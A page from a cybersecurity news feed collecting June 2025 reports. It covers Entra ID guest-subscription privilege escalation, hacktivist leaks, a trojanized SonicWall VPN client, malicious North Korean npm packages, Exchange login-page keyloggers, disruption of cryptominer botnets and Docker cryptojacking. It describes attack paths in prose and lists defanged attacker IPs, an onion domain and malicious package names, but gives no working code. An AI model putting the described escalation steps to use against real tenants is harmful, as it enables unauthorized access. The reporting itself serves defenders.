Tag: Cyber Security

If you invite guest users into your Entra ID tenant, you may be opening yourself up to a surprising risk.

A gap in access control in Microsoft Entra’s subscription handling is allowing guest users to create and transfer subscriptions into the tenant they are invited into, while maintaining full ownership of them.

All the guest user needs are the permissions to create subscriptions in their home tenant, and an invitation as a guest user into an external tenant. Once inside, the guest user can create subscriptions in their home tenant, transfer them into the external tenant, and retain full ownership rights. This stealthy privilege escalation tactic allows a guest user to gain a privileged foothold in an environment where they should only have limited access.

Many organizations treat guest accounts as low-risk based on their temporary, limited access, but this behavior, which works as designed, opens the door to known attack paths and lateral movement within the resource tenant. It can allow a threat actor to achieve unauthorized reconnaissance and persistence in the defender’s Entra ID, and advance privilege escalation in certain scenarios.

Typical threat models and best practices don’t account for an unprivileged guest creating their own subscription within your tenant, so this risk may not only exist outside your organization’s controls; it may be off your security team’s radar as well.

How to Compromise Your Entra ID Tenant with a Guest User Account

Guest-made subscription footholds exploit the fact that Microsoft’s billing permissions (Enterprise Agreement or Microsoft Customer Agreement) are scoped at the billing account, not the Entra directory. Most security teams think about Azure permissions as either Entra Directory Roles (such as Global Administrator) or Azure RBAC Roles (such as Owner). But there is another set of permissions that get overlooked: Billing Roles.

While Entra Directory and Azure RBAC Roles focus on managing permissions around identities and access to resources, Billing roles operate at the billing account level, which exists outside the well-understood Azure tenant authentication and authorization boundaries. A user with the right billing role can spin up or transfer subscriptions from their home tenant to gain control inside a target tenant, and a security team that is strictly auditing Entra Directory roles won’t gain visibility of these subscriptions in a standard Entra permission review.

When a B2B guest user is invited to a resource tenant, they access the tenant via federation from their home tenant. This is a cost-saving measure, the trade-off being that your tenant cannot enforce auth controls like MFA. As such, defenders usually try to limit the privileges and access of guests as they are inherently less securable. However, if the guest has a valid billing role in their home tenant, they can use it to become a subscription owner inside Azure.

This is also true for guest users who exist in pay-as-you-go Azure tenants that an attacker could spin up in just a few minutes. And, by default, any user, including guests, can invite external users into the directory. This means an attacker could leverage a compromised account to invite in a user with the correct billing permissions into your environment.

• Listing Root Management Group Administrators – In many tenant configurations, guest users have zero permissions to list other users within a tenant; however, following a guest subscription attack, that visibility becomes possible. The guest Owner can view the “Access Control” role assignments on the subscription they’ve created. Any administrators assigned at the root management group level of the tenant will be inherited and will appear in the role assignments view of the subscription, exposing a list of high-value privileged accounts that are ideal targets for follow-on attacks and social engineering.
• Weakening the Default Azure Policy Tied to the Subscription – By default, all subscriptions (and their resources) are governed by Azure policies designed to enforce security standards and trigger alerts when violations occur. However, when a guest becomes a subscription Owner, they have full write permissions to all policies that apply to their subscription and can modify or disable them, effectively muting security alerts that would otherwise notify defenders of suspicious or non-compliant activity. This further reduces visibility from security monitoring tools, allowing the attacker to perform malicious activities or target external systems under the radar.
• Creating a User-Managed Identity in the Entra ID Directory – A guest user with subscription Owner permissions can create a User-Managed Identity, a special Azure identity that lives in the Entra directory, but is linked to cloud workloads, within their subscription. This identity can:
  • Persist independently of the original guest account
  • Be granted roles or permissions beyond the subscription
  • Blend in with legitimate service identities, making detection harder
  • Launch a targeted API permission phishing attack to trick legitimate admins into granting this managed identity elevated privileges.
• Registering Microsoft Entra-Joined Devices and abusing Conditional Access Policies – Azure allows trusted devices to be registered and joined to Entra ID. An attacker can register devices under their hijacked subscription and have them appear as compliant corporate devices. Many organizations use dynamic device groups to auto-assign roles or access based on device status (e.g., “all users on compliant laptops get access to X”). By spoofing or registering a device, an attacker could abuse Conditional Access Policies and gain unauthorized access to trusted assets. This represents a device-based variant of a known dynamic group exploit^[1] previously seen in user object targeting. BeyondTrust’s Identity Security Insights product has helped customers uncover many similar misconfigured dynamic groups that unintentionally expose hidden Paths to Privilege™.

Why Guest Subscription Creation Is a Growing Concern for Entra Security

While more work is required to understand the true implications of this updated threat model, what we already know is concerning: any guest account federated into your tenant may represent a path to privilege. The risk is not hypothetical. Researchers at BeyondTrust have observed attackers actively abusing guest-based subscription creation in the wild. The threat is present, active, and the real danger here lies in the fact that it’s largely under the radar.

These actions fall outside what most Azure administrators expect a guest user to be capable of. Most security teams don’t account for guest users being able to create and control subscriptions. As a result, this attack vector often falls outside of typical Entra threat models, making this path to privilege under-recognized, unexpected, and dangerously accessible.

This attack vector is extremely common in B2B scenarios, where home and resource tenants are often controlled by different organizations. We suspect many organizations leveraging Entra ID B2B Guest features are unaware of the possible paths to privilege that this feature inadvertently enables.

Mitigations: How to Prevent Guest Subscription Accounts from Gaining a Foothold

To mitigate this behaviour, Microsoft allows organizations to configure Subscription Policies to block guests from transferring subscriptions into their tenant. This setting restricts subscription creation to explicitly permitted users only, and Microsoft has published supporting documentation^[2] for this control.

In addition to enabling this policy, we recommend the following actions:

1. Audit all guest accounts in your environment and remove those that are no longer required
2. Harden guest controls as much as possible: for instance, disable guest-to-guest invitations
3. Monitor all subscriptions in your tenant regularly to detect unexpected guest-created subscriptions and resources
4. Monitor all Security Center alerts in the Azure Portal; some may appear even if the visibility is inconsistent
5. Audit device access, especially if these utilize dynamic group rules.

To assist defenders, BeyondTrust Identity Security Insights provides built-in detections to flag subscriptions created by guest accounts, offering automated visibility into these unusual behaviors.

BeyondTrust Identity Security Insights customers can gain a holistic view of all Identities across their entire identity fabric. This includes gaining a consolidated understanding of Entra Guest accounts and their True Privilege™.

The Bigger Picture: Identity Misconfigurations Are the New Exploits

Guest-made subscription compromise isn’t an anomaly; it’s a stark example of the many overlooked identity security weaknesses that can undermine the modern enterprise environment, if not adequately addressed. Misconfigurations and weak default settings are prime access points for threat actors who are looking for the hidden paths into your environment.

It isn’t just your admin accounts that need to be included in your security policies anymore. B2B trust models, inherited billing rights, and dynamic roles mean that every account is a potential launch point for privilege escalation. Re-examine your guest access policies, visibility tools, and subscription governance models now, before these Restless Guests take advantage.

To gain a snapshot of potential identity-based risks in your environment, including those introduced through guest access, BeyondTrust offers a no-cost Identity Security Risk Assessment.

Note: This article is expertly written and contributed by Simon Maxwell-Stewart, Senior Security Researcher at BeyondTrust. Simon Maxwell-Stewart is a University of Oxford physics graduate with over a decade of experience in the big data environment. Before joining BeyondTrust, he worked as a Lead Data Scientist in healthcare, and successfully brought multiple machine learning projects into production. Now working as a “resident graph nerd” on BeyondTrust’s security research team, Simon applies his expertise in graph analysis to help drive identity security innovation.

Thousands of personal records allegedly linked to athletes and visitors of the Saudi Games have been published online by a pro-Iranian hacktivist group called Cyber Fattah.

Cybersecurity company Resecurity said the breach was announced on Telegram on June 22, 2025, in the form of SQL database dumps, characterizing it as an information operation “carried out by Iran and its proxies.”

“The actors gained unauthorized access to phpMyAdmin (backend) and exfiltrated stored records,” Resecurity said. “This is an example of Iran using data breaches as part of a larger anti-U.S., anti-Israel, and anti-Saudi propaganda activity in cyberspace, targeting major sports and social events.”

It’s believed that the data is likely pulled from the Saudi Games 2024 official website and then shared on DarkForums, a cybercrime forum that has gained attention in the wake of BreachForums’ repeated takedowns. The information was published by a forum user named ZeroDayX, a burner profile that was likely created to promote this breach.

The leaked data includes IT staff credentials; government official email addresses; athletes’ and visitors’ information; passports and ID cards; bank statements; medical forms; and scanned copies of sensitive documents.

“The activities of Cyber Fattah align with a broader trend of hacktivism in the Middle East, where groups frequently engage in cyber warfare as a form of activism,” Resecurity said.

The leak unfolds against the backdrop of simmering tensions between Iran and Israel, with as many as 119 hacktivist groups claiming to have conducted cyber attacks or have made declarations to align with or act against the two nations, per Cyberknow.

Cyber Fattah, which calls itself an “Iranian cyber team,” has a history of targeting Israeli and Western web resources and government agencies.

It’s also known to collaborate with other threat actors active in the region, such as 313 Team, which claimed responsibility for a distributed denial-of-service (DDoS) attack against social media platform Truth Social in retaliation for U.S. airstrikes on Iran’s nuclear facilities.

“This incident by Cyber Fattah may indicate an interesting shift from Israel-centric malicious activity toward a broader focus on anti-U.S. and anti-Saudi messaging,” Resecurity said.

Last week, a pro-Israel group known as Predatory Sparrow (aka Adalat Ali, Gonjeshke Darande, Indra, or MeteorExpress) claimed to have leaked data obtained from the Iranian Ministry of Communications. Notably, it also hacked Iran’s largest cryptocurrency exchange, Nobitex, and burned over $90 million in cryptocurrency by sending digital assets to invalid wallets.

Cybersecurity company Outpost24 said the attackers possibly had “access to internal documentation that detailed the inner workings of the exchange and possibly even authentication credentials” to pull off the heist, or that it was a case of a rogue insider who worked with the group.

“This was not a financially motivated heist but a strategic, ideological, and psychological operation,” security researcher Lidia López Sanz said. “By destroying rather than exfiltrating funds, the threat actor emphasized its goals: dismantling public trust in regime-linked institutions and signaling its technical superiority.”

Subsequently, on June 18, Iran’s state broadcaster IRIB’s (short for Islamic Republic of Iran Broadcasting) television stream was hijacked to display pro-Israeli and anti-Iranian government imagery. IRIB claimed Israel was behind the incident.

Image Source: Cyberknow

Israel, for its part, has also become a target of pro-Palestine hacking groups like the Handala team, which has listed several Israeli organizations on its data leak site starting June 14, 2025. These included Delek Group, Y.G. New Idan, and AeroDreams.

Another trend observed in the cyber warfare between Iran and Israel is the coming together of smaller hacktivist groups to form umbrella entities like the Cyber Islamic Resistance or United Cyber Front for Palestine and Iran.

“These loosely affiliated ‘cyber unions’ share resources and synchronize campaigns, amplifying their impact despite limited technical sophistication,” Trustwave SpiderLabs said in a report published last week.

The company also singled out another pro-Iranian group named DieNet that, despite its pro-Iranian and pro-Hamas stance, is believed to include Russian-speaking members and connections to other cyber communities in Eastern Europe.

“What distinguishes DieNet from many other pro-Iranian actors is its hybrid identity,” it noted. “Linguistic analysis of DieNet’s messages, as well as timestamps, metadata, and interaction pattern, suggests that at least part of the group communicates internally in Russian or uses Slavic-language resources.”

“This points to the broader phenomenon of cross-regional cyber collaboration, where ideological alignment overrides geographic or national boundaries.”

Group-IB, in an analysis of Telegram-based hacktivist activity following June 13, said DieNet was the most referenced channel, quoted 79 times during the time period. In all, more than 5,800 messages have been recorded across various hacktivist channels between June 13 and 20.

The deployment of cyber capabilities in the context of the Iran-Israel war, as well as other recent geopolitical events surrounding Hamas–Israel and Russia-Ukraine conflicts, demonstrates how digital operations are increasingly being integrated to supplement kinetic actions, influence public perception, and disrupt critical infrastructure, Trustwave added.

Jun 25, 2025Ravie LakshmananVPN Security / Malware

Unknown threat actors have been distributing a trojanized version of SonicWall’s SSL VPN NetExtender application to steal credentials from unsuspecting users who may have installed it.

“NetExtender enables remote users to securely connect and run applications on the company network,” SonicWall researcher Sravan Ganachari said. “Users can upload and download files, access network drives, and use other resources as if they were on the local network.”

The malicious payload delivered via the rogue VPN software has been codenamed SilentRoute by Microsoft, which detected the campaign along with the network security company.

SonicWall said the malware-laced NetExtender impersonates the latest version of the software (10.3.2.27) and has been found to be distributed via a fake website that has since been taken down. The installer is digitally signed by CITYLIGHT MEDIA PRIVATE LIMITED.”

This suggests that the campaign is targeting users searching for NetExtender on search engines like Google or Bing, and tricking them into installing it through spoofed sites propagated via known techniques like spear-phishing, search engine optimization (SEO) poisoning, malvertising, or social media posts.

Two different components of the installer have been modified to facilitate the exfiltration of the configuration information to a remote server under the attacker’s control.

These include “NeService.exe” and “NetExtender.exe,” which have been altered to bypass the validation of digital certificates various NetExtender components and continue execution regardless of the validation results and exfiltrate the information to 132.196.198[.]163 over port 8080.

“The threat actor added code in the installed binaries of the fake NetExtender so that information related to VPN configuration is stolen and sent to a remote server,” Ganachari said.

“Once the VPN configuration details are entered and the “Connect” button is clicked, the malicious code performs its own validation before sending the data to the remote server. Stolen configuration information includes the username, password, domain, and more.”

Threat Actors Abuse ConnectWise Authenticode Signatures

The development comes as G DATA detailed a threat activity cluster dubbed EvilConwi that involves bad actors abusing ConnectWise to embed malicious code using a technique called authenticode stuffing without invalidating the digital signature.

The German cybersecurity company said it has observed a spike in attacks using this technique since March 2025. The infection chains primarily leverage phishing emails as an initial access vector or through bogus sites advertised as artificial intelligence (AI) tools on Facebook.

These email messages contain a OneDrive link that redirects recipients to a Canva page with a “View PDF” button, which results in the surreptitious download and execution of a ConnectWise installer.

The attacks work by implanting malicious configurations in unauthenticated attributes within the Authenticode signature to serve a fake Windows update screen and prevent users from shutting down their systems, as well as including information about the external URL to which the remote connection should be established for persistent access.

What makes EvilConwi notable is that it offers malicious actors a cover for nefarious operations by conducting them using a trusted, legitimate, and maybe elevated system or software process, thereby allowing them to fly under the radar.

“By modifying these settings, threat actors create their own remote access malware that pretends to be a different software like an AI-to-image converter by Google Chrome,” security researcher Karsten Hahn said. “They commonly add fake Windows update images and messages too, so that the user does not turn off the system while threat actors remotely connect to them.”

Jun 25, 2025Ravie LakshmananMalware / Open Source

Cybersecurity researchers have uncovered a fresh batch of malicious npm packages linked to the ongoing Contagious Interview operation originating from North Korea.

According to Socket, the ongoing supply chain attack involves 35 malicious packages that were uploaded from 24 npm accounts. These packages have been collectively downloaded over 4,000 times. The complete list of the JavaScript libraries is below –

• react-plaid-sdk
• sumsub-node-websdk
• vite-plugin-next-refresh
• vite-plugin-purify
• nextjs-insight
• vite-plugin-svgn
• node-loggers
• react-logs
• reactbootstraps
• framer-motion-ext
• serverlog-dispatch
• mongo-errorlog
• next-log-patcher
• vite-plugin-tools
• pixel-percent
• test-topdev-logger-v1
• test-topdev-logger-v3
• server-log-engine
• logbin-nodejs
• vite-loader-svg
• struct-logger
• flexible-loggers
• beautiful-plugins
• chalk-config
• jsonpacks
• jsonspecific
• jsonsecs
• util-buffers
• blur-plugins
• proc-watch
• node-orm-mongoose
• prior-config
• use-videos
• lucide-node, and
• router-parse

Of these, six continue to remain available for download from npm: react-plaid-sdk, sumsub-node-websdk, vite-plugin-next-refresh, vite-loader-svg, node-orm-mongoose, and router-parse.

Each of the identified npm packages contains a hex-encoded loader dubbed HexEval, which is designed to collect host information post installation and selectively deliver a follow-on payload that’s responsible for delivering a known JavaScript stealer called BeaverTail.

BeaverTail, in turn, is configured to download and execute a Python backdoor called InvisibleFerret, enabling the threat actors to collect sensitive data and establish remote control of infected hosts.

“This nesting-doll structure helps the campaign evade basic static scanners and manual reviews,” Socket researcher Kirill Boychenko said. “One npm alias also shipped a cross-platform keylogger package that captures every keystroke, showing the threat actors’ readiness to tailor payloads for deeper surveillance when the target warrants it.”

Contagious Interview, first publicly documented by Palo Alto Networks Unit 42 in late 2023, is an ongoing campaign undertaken by North Korean state-sponsored threat actors to obtain unauthorized access to developer systems with the goal of conducting cryptocurrency and data theft.

The cluster is also broadly tracked under the monikers CL-STA-0240, DeceptiveDevelopment, DEV#POPPER, Famous Chollima, Gwisin Gang, Tenacious Pungsan, UNC5342, and Void Dokkaebi.

Recent iterations of the campaign have also been observed taking advantage of the ClickFix social engineering tactic to deliver malware such as GolangGhost and PylangGhost. This sub-cluster of activity has been designated the name ClickFake Interview.

The latest findings from Socket point to a multi-pronged approach where Pyongyang threat actors are embracing various methods to trick prospective targets into installing malware under the pretext of an interview or a Zoom meeting.

The npm offshoot of Contagious Interview typically involves the attackers posing as recruiters on LinkedIn, sending job seekers and developers coding assignments by sharing a link to a malicious project hosted on GitHub or Bitbucket that embeds the npm packages within them.

“They target software engineers who are actively job-hunting, exploiting the trust that job-seekers typically place in recruiters,” Boychenko said. “Fake personas initiate contact, often with scripted outreach messages and convincing job descriptions.”

The victims are then coaxed into cloning and running these projects outside containerized environments during the purported interview process.

“This malicious campaign highlights an evolving tradecraft in North Korean supply chain attacks, one that blends malware staging, OSINT-driven targeting, and social engineering to compromise developers through trusted ecosystems,” Socket said.

“By embedding malware loaders like HexEval in open source packages and delivering them through fake job assignments, threat actors sidestep perimeter defenses and gain execution on the systems of targeted developers. The campaign’s multi-stage structure, minimal on-registry footprint, and attempt to evade containerized environments point to a well-resourced adversary refining its intrusion methods in real-time.”

Jun 25, 2025Ravie LakshmananEndpoint Security / IT Management

Microsoft on Tuesday announced that it’s extending Windows 10 Extended Security Updates (ESU) for an extra year by letting users either pay a small fee of $30 or by sync their PC settings to the cloud.

The development comes ahead of the tech giant’s upcoming October 14, 2025, deadline, when it plans to officially end support and stop providing security updates for devices running Windows 10. The desktop operating system was launched in July 2015.

The Windows maker describes ESU as a “last resort option” for customers who need to run legacy Microsoft software that has reached end-of-life (EoL) status. This is meant to be a temporary solution while migrating to a newer supported platform.

As part of the new enrollment options announced by Microsoft, individuals can opt-in to the program from their personal Windows 10 PC through an “enrollment wizard” available in the Settings app. Users can choose one of the three options –

• Use Windows Backup to sync your settings to the cloud (at no additional cost)
• Redeem 1,000 Microsoft Rewards points (at no additional cost)
• Pay $30 (local pricing may change)

Once the appropriate option is selected, users’ PCs will be automatically enrolled into the program. ESU coverage for Windows 10 devices runs from October 15, 2025, to October 13, 2026.

The enrollment wizard is currently available in the Windows Insider Program, and is expected to be rolled out to Windows 10 customers in July, with expanded availability set for mid-August.

It’s worth noting that ESUs do not cover new features, non-security updates, or design change requests. Another key aspect to factor in is that using Microsoft Rewards or Windows Backup requires users to sign up for a Microsoft account, if they don’t have it already.

“Individuals or organizations who elect to continue using Windows 10 after support ends on October 14, 2025, will have the option of enrolling their PCs into a paid ESU subscription,” Microsoft notes.

“The ESU program enables PCs to continue to receive critical and important security updates through an annual subscription service after support ends.”

Jun 24, 2025Ravie LakshmananSocial Media / Privacy

The United States Embassy in India has announced that applicants for F, M, and J nonimmigrant visas should make their social media accounts public.

The new guideline seeks to help officials verify the identity and eligibility of applicants under U.S. law. The U.S. Embassy said every visa application review is a “national security decision.”

“Effective immediately, all individuals applying for an F, M, or J nonimmigrant visa are requested to adjust the privacy settings on all of their personal social media accounts to ‘public’ to facilitate vetting necessary to establish their identity and admissibility to the United States,” the embassy said in a post on X.

Under the new rules, Indian students and others planning to pursue academia or enroll in vocational or exchange programs are mandated to ensure that their social media profiles are set to public before submitting their visa applications. A refusal to set the accounts to “public” could be grounds for rejection.

The embassy noted that the United States has required visa applicants to provide social media identifiers on immigrant and nonimmigrant visa application forms since 2019.

It also said every piece of “available” information is used as part of its visa screening and vetting to identify visa applicants who are deemed inadmissible to the country, including those who pose a threat to its national security. However, it did not spell out what these steps would look for.

Similar directives have been issued by other U.S. embassies across the world, with the U.S. Embassy in Mexico stating that visa applicants must list all social media usernames or handles of every platform they have used from the last 5 years.

The development comes weeks after U.S. President Donald Trump’s administration ordered embassies around the world to stop scheduling appointments for student visas to expand social media vetting of such applicants. Last week, the U.S. Department of State said it’s resuming the process, but with new measures that require applicants to unlock their social media accounts for government review.

“The United States must be vigilant during the visa issuance process to ensure that those applying for admission into the United States do not intend to harm Americans and our national interests, and that all applicants credibly establish their eligibility for the visa sought, including that they intend to engage in activities consistent with the terms for their admission,” the department said.

Jun 24, 2025Ravie LakshmananVulnerability / Malware

Unidentified threat actors have been observed targeting publicly exposed Microsoft Exchange servers to inject malicious code into the login pages that harvest their credentials.

Positive Technologies, in a new analysis published last week, said it identified two different kinds of keylogger code written in JavaScript on the Outlook login page –

• Those that save collected data to a local file accessible over the internet
• Those that immediately send the collected data to an external server

The Russian cybersecurity vendor said the attacks have targeted 65 victims in 26 countries worldwide, and marks a continuation of a campaign that was first documented in May 2024 as targeting entities in Africa and the Middle East.

At that time, the company said it had detected no less than 30 victims spanning government agencies, banks, IT companies, and educational institutions, with evidence of the first compromise dating back to 2021.

The attack chains involve exploiting known flaws in Microsoft Exchange Server (e.g., ProxyShell) to insert keylogger code into the login page. It’s presently not known who is behind these attacks.

Some of the vulnerabilities weaponized are listed below –

• CVE-2014-4078 – IIS Security Feature Bypass Vulnerability
• CVE-2020-0796 – Windows SMBv3 Client/Server Remote Code Execution Vulnerability
• CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065 – Microsoft Exchange Server Remote Code Execution Vulnerability (ProxyLogon)
• CVE-2021-31206 – Microsoft Exchange Server Remote Code Execution Vulnerability
• CVE-2021-31207, CVE-2021-34473, CVE-2021-34523 – Microsoft Exchange Server Security Feature Bypass Vulnerability (ProxyShell)

“Malicious JavaScript code reads and processes the data from the authentication form, then sends it via an XHR request to a specific page on the compromised Exchange Server,” security researchers Klimentiy Galkin and Maxim Suslov said.

“The target page’s source code contains a handler function that reads the incoming request and writes the data to a file on the server.”

The file containing the stolen data is accessible from an external network. Select variants with the local keylogging capability have been found to also collect user cookies, User-Agent strings, and the timestamp.

One advantage of this approach is that the chances of detection are next to nothing as there is no outbound traffic to transmit the information.

The second variant detected by Positive Technologies, on the other hand, uses a Telegram bot as an exfiltration point via XHR GET requests with the encoded login and password stored in the APIKey and AuthToken headers, respectively.

A second method involves using a Domain Name System (DNS) tunnel in conjunction with an HTTPS POST request to send the user credentials and sneak past an organization’s defenses.

Twenty-two of the compromised servers have been found in government organizations, followed by infections in the IT, industrial, and logistics companies. Vietnam, Russia, Taiwan, China, Pakistan, Lebanon, Australia, Zambia, the Netherlands, and Turkey are among the top 10 targets.

“A large number of Microsoft Exchange servers accessible from the Internet remain vulnerable to older vulnerabilities,” the researchers said. “By embedding malicious code into legitimate authentication pages, attackers are able to stay undetected for long periods while capturing user credentials in plaintext.”

Jun 24, 2025Ravie LakshmananMalware / Cryptocurrency

Cybersecurity researchers have detailed two novel methods that can be used to disrupt cryptocurrency mining botnets.

The methods take advantage of the design of various common mining topologies in order to shut down the mining process, Akamai said in a new report published today.

“We developed two techniques by leveraging the mining topologies and pool policies that enable us to reduce a cryptominer botnet’s effectiveness to the point of completely shutting it down, which forces the attacker to make radical changes to their infrastructure or even abandon the entire campaign,” security researcher Maor Dahan said.

The techniques, the web infrastructure company said, hinge on exploiting the Stratum mining protocol such that it causes an attacker’s mining proxy or wallet to be banned, effectively disrupting the operation.

The first of the two approaches, dubbed bad shares, entails banning the mining proxy from the network, which, in turn, results in the shutdown of the entire operation and causes the victim’s CPU usage to plummet from 100% to 0%.

While a mining proxy acts as an intermediary and shields an attacker’s mining pool and, by extension, their wallet addresses, it also becomes a single point of failure by interfering with its regular function.

“The idea is simple: By connecting to a malicious proxy as a miner, we can submit invalid mining job results — bad shares — that will bypass the proxy validation and will be submitted to the pool,” Dahan explained. “Consecutive bad shares will eventually get the proxy banned, effectively halting mining operations for the entire cryptomining botnet.”

This, in turn, entails using an in-house developed tool called XMRogue to impersonate a miner, connect to a mining proxy, submit consecutive bad shares, and ultimately ban the mining proxy from the pool.

The second method devised by Akamai exploits scenarios where a victim miner is connected directly to a public pool sans a proxy, leveraging the fact that the pool can ban a wallet’s address for one hour if it has more than 1,000 workers.

In other words, initiating more than 1,000 login requests using the attacker’s wallet concurrently will force the pool to ban the attacker’s wallet. However, it’s worth noting this isn’t a permanent solution as the account can stage a recovery as soon as the multiple login connections are stopped.

Akamai noted that while the aforementioned methods have been used to target Monero cryptocurrency miners, they can be extended to other cryptocurrencies as well.

“The techniques presented above show how defenders can effectively shut down malicious cryptominer campaigns without disrupting the legitimate pool operation by taking advantage of pool policies,” Dahan said.

“A legitimate miner will be able to quickly recover from this type of attack, as they can easily modify their IP or wallet locally. This task would be much more difficult for a malicious cryptominer as it would require modifying the entire botnet. For less sophisticated miners, however, this defense could completely disable the botnet.”

Jun 24, 2025Ravie LakshmananThreat Exposure Management

I had the honor of hosting the first episode of the Xposure Podcast live from Xposure Summit 2025. And I couldn’t have asked for a better kickoff panel: three cybersecurity leaders who don’t just talk security, they live it.

Let me introduce them.

Alex Delay, CISO at IDB Bank, knows what it means to defend a highly regulated environment. Ben Mead, Director of Cybersecurity at Avidity Biosciences, brings a forward-thinking security perspective that reflects the innovation behind Avidity’s targeted RNA therapeutics. Last but not least, Michael Francess, Director of Cybersecurity Advanced Threat at Wyndham Hotels and Resorts, leads the charge in protecting the franchise. Each brought a unique vantage point to a common challenge: applying Continuous Threat Exposure Management (CTEM) to complex production environments.

Gartner made waves in 2023 with a bold prediction: organizations that prioritize CTEM will be three times less likely to be breached by 2026. But here’s the kicker – only if it’s operationalized.

Speaking with these seasoned defenders, we unpacked the realities and challenges behind the hype of implementing and operationalizing an effective Exposure Management strategy, addressing the following tough questions:

• What does a good CTEM program look like and what are the typical challenges that need to be overcome?
• How do you optimize cyber and risk reporting to influence board-level decisions?
• And ultimately, how do you measure the success of your CTEM program?

Challenges, Priorities, and Best Practices

CTEM isn’t plug-and-play. The panelists’ prescription was clear: start with asset inventory and identity management; weak service accounts, over-permissioned users, legacy logins. None of these are small gaps, they’re wide-open doors that need to be checked frequently. And for all of our panelists, frequency matters – a lot. Because guess what? Adversaries are constantly challenging defenses too. For internal assets, weekly validation is the rule of thumb. For external-facing assets? Daily. As they see it, it’s the only way to maintain a constant handle over their constantly changing environments.

Surprisingly, Michael pointed to threat intelligence as the backbone of any security testing program. “You need to understand your adversaries, simulate their TTPs, and test your defenses against real-world scenarios, not just patching CVEs.” That’s the key difference between CTEM and vulnerability management. Vulnerability management is about patching. Exposure management is about figuring out whether your controls actually work to block threats.

Reporting: Translating Cyber to Risk Terms

In the banking industry, like many other highly regulated industries, Alex couldn’t emphasize enough the need to be prepared to answer hard questions asked from regulators. “You will get challenged on your exposure, your remediation timelines, and your risk treatment. And that’s a good thing. It forces clarity and accountability”.

But even outside regulated industries, the conversation is changing. Boards do not want to hear about CVSS scores. They want to understand risk – and that’s a completely different discussion. Is the company’s risk profile going up or down? Where is it concentrated? And what are we doing about it?

Measuring Progress

Success in CTEM isn’t about counting vulnerabilities; Ben pinned it down when he said he measures the number of exploited attack paths his team has closed. He shared how validating attack paths revealed risky security gaps, like over-permissioned accounts and forgotten assets. Suddenly, risk becomes visible.

Others took it in another direction with tabletop exercises that walk leadership through real

attack scenarios. It’s not about metrics, it’s about explaining the risk and the consequences. A shift that moves the discussion from noise to signal, and gives the business clarity on what matters: where we’re exposed, and what we’re doing about it.

From Concept to Action

Want to hear how these defenders are putting CTEM into action without drowning in noise?

This episode dives deep into the real questions: where do you start, how do you stay focused on what’s exploitable, and how do you connect it all to business risk? You’ll hear first-hand how security leaders like Alex, Ben, and Michael are tackling these challenges head-on, with a few surprises along the way…

🎧Make sure to catch the full conversation on Apple Podcast and Spotify

Jun 24, 2025Ravie LakshmananCloud Security / Cryptojacking

Misconfigured Docker instances are the target of a campaign that employs the Tor anonymity network to stealthily mine cryptocurrency in susceptible environments.

“Attackers are exploiting misconfigured Docker APIs to gain access to containerized environments, then using Tor to mask their activities while deploying crypto miners,” Trend Micro researchers Sunil Bharti and Shubham Singh said in an analysis published last week.

In using Tor, the idea is to anonymize their origins during the installation of the miner on compromised systems. The attacks, per the cybersecurity company, commence with a request from the IP address 198.199.72[.]27 to obtain a list of all containers on the machine.

If no containers are present, the attacker proceeds to create a new one based on the “alpine” Docker image and mounts the “/hostroot” directory – i.e., the root directory (“/”) of the physical or virtual host machine – as a volume inside it. This behavior poses security risks as it allows the container to access and modify files and directories on the host system, resulting in a container escape.

The threat actors then execute a carefully orchestrated sequence of actions that involves running a Base64-encoded shell script to set up Tor on the container as part of the creation request and ultimately fetch and execute a remote script from a .onion domain (“wtxqf54djhp5pskv2lfyduub5ievxbyvlzjgjopk6hxge5umombr63ad[.]onion”)

“It reflects a common tactic used by attackers to hide command-and-control (C&C) infrastructure, avoid detection, and deliver malware or miners within compromised cloud or container environments,” the researchers said. “Additionally, the attacker uses ‘socks5h’ to route all traffic and DNS resolution through Tor for enhanced anonymity and evasion.”

Once the container is created, the “docker-init.sh” shell script is deployed, which then checks for the “/hostroot” directory mounted earlier and modifies the system’s SSH configuration to set up remote access by enabling root login and adding an attacker-controlled SSH key into the ~/.ssh/authorized_keys file.

The threat actor has also been found to install various tools like masscan, libpcap, zstd, and torsocks, beacon to the C&C server details about the infected system, and ultimately deliver a binary that acts as a dropper for the XMRig cryptocurrency miner, along with the necessary mining configuration, the wallet addresses, and mining pool URLs.

“This approach helps attackers avoid detection and simplifies deployment in compromised environments,” Trend Micro said, adding it observed the activity targeting technology companies, financial services, and healthcare organizations.

The findings point to an ongoing trend of cyber attacks that target misconfigured or poorly secured cloud environments for cryptojacking purposes.

The development comes as Wiz revealed that a scan of public code repositories has uncovered hundreds of validated secrets in mcp.json, .env, and AI agent configuration files and Python notebooks (.ipynb), turning them into a treasure trove for attackers.

The cloud security firm said it found valid secrets belonging to over 30 companies and startups, including those belonging to Fortune 100 companies.

“Beyond just secrets, code execution results in Python notebooks should be generally treated as sensitive,” researchers Shay Berkovich and Rami McCarthy said. “Their content, if correlated to a developer’s organization, can provide reconnaissance details for malicious actors.”